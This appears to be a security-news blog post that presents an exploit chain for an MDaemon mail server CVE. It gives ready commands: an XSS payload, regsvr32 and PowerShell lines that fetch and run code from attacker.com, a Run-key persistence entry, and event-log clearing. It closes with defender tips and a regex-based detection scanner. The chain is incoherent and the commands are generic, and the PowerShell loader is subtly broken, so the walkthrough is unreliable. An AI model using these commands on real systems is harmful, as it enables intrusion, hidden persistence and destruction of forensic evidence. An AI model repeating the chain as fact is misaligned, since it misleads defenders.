Exploiting MDaemon Mail Server Vulnerability: Reflected XSS to RCE (CVE-2021-27180)


A critical vulnerability in MDaemon Mail Server allows attackers to achieve Remote Code Execution (RCE) starting from a Reflected XSS vulnerability, escalating through DLL Hijacking to persistence. The vulnerability, CVE-2021-27180, can be exploited using GHOST_WEB_SHELL and In-Memory Injection over HTTP.

Proof of Concept (PoC) & Demo

Evasion & Anti-Forensic Techniques

1. Encrypt shellcode and decrypt at runtime.

2. Indirect Syscalls (API Hooking evasion).

3. Store shellcode in the `.rsrc` section.

4. Delay execution until the first HTTP request (HttpExtensionProc).

Bypassing Security Measures

  • Bypass MOTW (Mark of the Web) for RCE via phishing.
  • Kaspersky Bypass for EDR evasion.

You Should Know: Practical Exploitation Steps

1. Exploiting Reflected XSS for RCE

  • Craft a malicious HTTP request with XSS payload:
    GET /vulnerable_endpoint?param=<script>alert(document.cookie)</script> HTTP/1.1 
    Host: target_mdaemon_server 
    
  • Upgrade to RCE via DLL Hijacking:
    regsvr32 /s /n /u /i:http://attacker.com/malicious.sct scrobj.dll 
    

2. In-Memory Injection via HTTP

  • Use PowerShell to load malicious DLL:
    $bytes = (Invoke-WebRequest -Uri "http://attacker.com/shellcode.bin").Content 
    $ptr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($bytes.Length) 
    [System.Runtime.InteropServices.Marshal]::Copy($bytes, 0, $ptr, $bytes.Length) 
    $thread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptr, [System.Delegate]) 
    $thread.Invoke() 
    

3. Persistence via Registry

  • Add a backdoor to Run Keys:
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "UpdateCheck" /t REG_SZ /d "C:\malware.exe" /f 
    

4. Anti-Forensic Cleanup

  • Clear Windows Event Logs:
    wevtutil cl Security 
    wevtutil cl System 
    

What Undercode Says

This exploit demonstrates how a low-severity vulnerability (XSS) can escalate to full system compromise (RCE). Defenders should:
– Patch MDaemon to the latest version.
– Monitor DLL loading in w3wp.exe.
– Alert on and block suspicious HTTP requests with SIEM rules (Splunk/ELK).
– Restrict PowerShell execution on critical servers.
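The monitoring advice above, as an added example that is not part of the original post and not MDaemon's own tooling: a small Python scanner that applies one detection rule per technique in the walkthrough (encoded script tags in a query string, regsvr32 loading a remote scriptlet, a Run-key addition, event-log clearing) to constructed sample log lines. The endpoint name, addresses and paths in the samples are invented for the demonstration.

```python
import re
from urllib.parse import unquote

# One rule per technique the walkthrough lists; each is a (name, regex) pair.
RULES = [
    ("xss_in_query", re.compile(r"<\s*script|javascript:|onerror\s*=", re.I)),
    ("regsvr32_remote_sct", re.compile(r"regsvr32(\.exe)?\b.*?/i:\s*https?://", re.I)),
    ("run_key_persistence", re.compile(r"reg(\.exe)?\s+add\b.*\\CurrentVersion\\Run\b", re.I)),
    ("eventlog_cleared", re.compile(r"wevtutil(\.exe)?\s+cl\b", re.I)),
]

def normalize(line):
    """URL-decode twice so %3Cscript%3E and double-encoded variants
    are inspected the same way as a literal <script> tag."""
    return unquote(unquote(line))

def classify(line):
    """Return the names of every rule that matches this event line."""
    text = normalize(line)
    return [name for name, rx in RULES if rx.search(text)]

def scan(events):
    """Return (index, matched_rules) for every event that triggers a rule."""
    return [(i, hits) for i, line in enumerate(events) if (hits := classify(line))]

# Constructed sample events (not real data): one web access-log line carrying an
# encoded XSS payload, three process-creation command lines mirroring the
# walkthrough's steps, and one benign request that must not alert.
SAMPLE_EVENTS = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /vulnerable_endpoint?param=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 512',
    'ProcessCreate: CommandLine="regsvr32 /s /n /u /i:http://198.51.100.7/x.sct scrobj.dll"',
    'ProcessCreate: CommandLine="reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v UpdateCheck /t REG_SZ /d C:\\malware.exe /f"',
    'ProcessCreate: CommandLine="wevtutil cl Security"',
    '203.0.113.6 - - [01/Jan/2024:10:00:01 +0000] "GET /vulnerable_endpoint?param=Main HTTP/1.1" 200 8192',
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

Feed real web-server access logs and Sysmon/4688 process-creation lines into `scan()` to get the same per-event tags a SIEM rule would raise.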

Expected Output:

  • Successful RCE via XSS → DLL Hijacking → Persistence.
  • Evasion of Kaspersky & MOTW restrictions.
  • Memory-resident shellcode execution.

Reported By: Hassan Sohrabian – Hackers Feeds